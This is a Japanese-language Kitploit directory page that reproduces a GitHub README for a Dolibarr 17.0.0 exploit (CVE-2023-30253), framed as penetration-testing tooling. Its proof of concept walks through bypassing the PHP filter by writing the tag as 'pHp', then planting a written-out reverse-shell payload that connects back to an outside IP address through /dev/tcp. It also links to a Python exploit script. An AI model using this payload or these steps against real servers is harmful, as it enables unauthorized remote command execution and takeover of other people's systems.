Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — Dolibarr 17.0.0 で CMS Website プラグイン(コア)が有効になっている場合、認証済みの攻撃者は、アプリケーションの制限をバイパスする PHP コードインジェクションを介してリモートコマンド実行を行うことができます。 | Kitploit
ツール/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

Dolibarr 17.0.0 で CMS Website プラグイン(コア)が有効になっている場合、認証済みの攻撃者は、アプリケーションの制限をバイパスする PHP コードインジェクションを介してリモートコマンド実行を行うことができます。

リポジトリを見る
9312年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Readme.md

CVE-2023-30253

CVE-2023-30253 は、Dolibarr ソフトウェアにおけるセキュリティ上の欠陥であり、認証されたユーザーが注入データ内で大文字操作テクニックを利用してリモートコード実行を可能にするものです。

影響

この脆弱性は、悪意のある行為者による不正なリモートコード実行につながる可能性があり、影響を受けるシステムのセキュリティと整合性に深刻な脅威をもたらします。 この脆弱性は Dolibarr 17.0.1 で修正されました。

参照

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


概念実証

以下の PoC は、手動でリバースシェルを取得する方法を示しています。

Untitled.png

テストユーザーとしてログインした後、Web サイトを作成/変更できます。

Untitled (1).png

まず Web サイトを作成し、次にページを作成します。

Untitled (2).png

Untitled

Web サイトとページを作成したら、双眼鏡アイコンをクリックします。これにより、作成したページが新しいタブで開きます。

次に、[HTML ソースの編集] をクリックします。

Untitled (4).png

ここでは php コードの追加を試みることができますが、php コードの記述を防ぐ何らかのフィルターがあります。 これは、php という単語の形式を変更することで簡単に回避できます。

Untitled (5).png

php という単語の形式を pHp に変更すると、正常に保存されたことが確認できます。

Untitled (6).png

ページに移動すると、挿入した php コードが動作していることが確認できます。

次に、リバースシェルを取得するために、netcat リスナーをセットアップしましょう。

Untitled (7).png

Untitled (8).png

次に、リバースシェルコードを追加します <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

Web サイトを開くと、リバースシェルが取得できます。

Untitled (9).png




python コードを使用すると、これをより簡単にできます。

Untitled

netcat リスナーをセットアップします。

Untitled

スクリプトを実行すると、リバースシェルが取得できるはずです。

Untitled スクリプトの作者: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

ツールをダウンロード